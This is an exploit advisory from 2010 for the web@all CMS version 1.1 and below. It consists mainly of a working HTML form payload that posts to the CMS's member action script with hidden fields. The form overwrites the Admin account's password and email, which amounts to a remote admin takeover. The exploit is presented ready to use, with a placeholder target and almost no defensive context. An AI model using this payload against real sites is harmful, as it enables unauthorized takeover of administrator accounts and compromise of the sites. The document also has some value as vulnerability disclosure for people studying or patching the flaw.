Web@All versions 1.1 and below remote administrative settings changing exploit.
f8d27969b53893e2eb3f8f56f6ca3224588ae76337b77ecd6eecd6f3410fd24a
===========================================
Web@all <= 1.1 Remote Admin Settings Change
===========================================
Author___: giudinvx
Email____: <giudinvx[at]gmail[dot]com>
Date_____: 27/12/2010
Site_____: http://www.giudinvx.altervista.org/
--------------------------------------------------------
Application Info:
web@all 1.1
web@all is a CMS which is not similar to general CMS,
you can build it easyly by yourself.
www.webatall.com
--------------------------------------------------------
==============[[ -Exploit Code- ]]==============
<html>
<form method="post" enctype="multipart/form-data"
action="[localhost]mem/action.php" name="f1">
Change Admin user, password and email.<br/>
Password<input type="text" value="" name="password"><br/>
Password<input type="text" value="" name="answer"><br/>
Email<input type="text" value="" name="email">
<input type="hidden" value="Admin" name="nickname">
<input type="hidden" value="" name="question">
<input type="hidden" value="" name="sign">
<input type="hidden" value="" name="person[firstname]">
<input type="hidden" value="" name="person[lastname]">
<input type="hidden" value="" name="person[country]">
<input type="hidden" value="" name="person[province]">
<input type="hidden" value="" name="person[city]">
<input type="hidden" value="" name="person[address]">
<input type="hidden" value="" name="person[zip]">
<input type="hidden" value="" name="person[mobile]">
<input type="hidden" value="" name="person[phone]">
<input type="hidden" value="" name="person[other]">
<input type="hidden" value="member" name="_lib">
<input type="hidden" value="member" name="_file">
<input type="hidden" value="person" name="memtype">
<input type="hidden" value="do_edit" name="_act">
<input type="submit" value="Submit">
</form>
</html>